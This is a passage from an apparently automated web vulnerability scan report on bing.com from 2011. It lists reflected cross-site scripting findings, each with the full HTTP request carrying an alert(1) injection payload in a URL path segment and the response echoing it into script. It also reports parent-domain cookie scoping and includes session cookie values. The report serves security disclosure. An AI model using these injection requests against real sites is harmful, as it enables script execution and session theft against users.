GET /local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 07c752f71e304cce9279a1b3c3465058
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs';</script>
...[SNIP]...

1.17. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32486'-alert(1)-'db160d7cb9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c296aefe178d45a1a5efca099d7e0fa0
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
indow.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d';</script>
...[SNIP]...

1.18. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bca9'-alert(1)-'895eb8d0830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 268015315b3445d49efb1994e1f301c5
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants
Content-Length: 18033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants';</script>
...[SNIP]...

1.19. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1def'-alert(1)-'6b7319ebc1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 7be42ec4956a469b82538dfc06674d05
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants
Content-Length: 18033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants';</script>
...[SNIP]...

1.20. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6eb'-alert(1)-'49a7dfafb56 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 8b0963cd534b4e8bbbbd7e985c9c8ac5
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants
Content-Length: 18061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
ion=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants';</script>
...[SNIP]...

1.21. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e13'-alert(1)-'2806c252a89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:39:28 GMT
Last-Modified: Fri, 11 Feb 2011 22:39:28 GMT
X-BM-TraceID: 976c295f755a460eb8f3f999f06169eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89
Content-Length: 81503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
w.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89';</script>
...[SNIP]...

1.22. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa461'-alert(1)-'6f0e1fe887b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(1)-'6f0e1fe887b HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 231a18c4916c4b70a646d63a7545364f
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=427de311063243808728d41ec43d59cd; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: CID=1764362dd5d54f5d804b3eac8f7488c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: CDate=2/11/2011 9:46:28 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=004F0C3CA2F24A41856FA89F6160974C; domain=.bing.com; path=/
Content-Length: 29347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(1)-'6f0e1fe887b';</script>
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 33 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.bing.com/travel/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.2. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-los-angeles.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-los-angeles.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=10; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-3n2vnipb2oiulyz4dk98nomu7t6s_VID-2999kjki8gjlyz46o65lm9u4oc6_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:33 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0A8F410795893A332A965C69339FF7E; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3FA678BC8CC54FFDB405305453C54626; domain=.bing.com; path=/
Content-Length: 134700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.3. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/weekend-deals-flight-deals.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/weekend-deals-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=8; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-2n3vc7stv0gusyz5ai187p3t99ue_VID-2rvgvj2qaejf8yz78uik5p44jda5_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:26 GMT; Path=/travel
Set-Cookie: JSESSIONID=D94BD82022034E3E99FAD80B6425BC45; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=7EF6DBEDCE444E9D9CD7ABFBFF0883A1; domain=.bing.com; path=/
Content-Length: 116517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.4. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
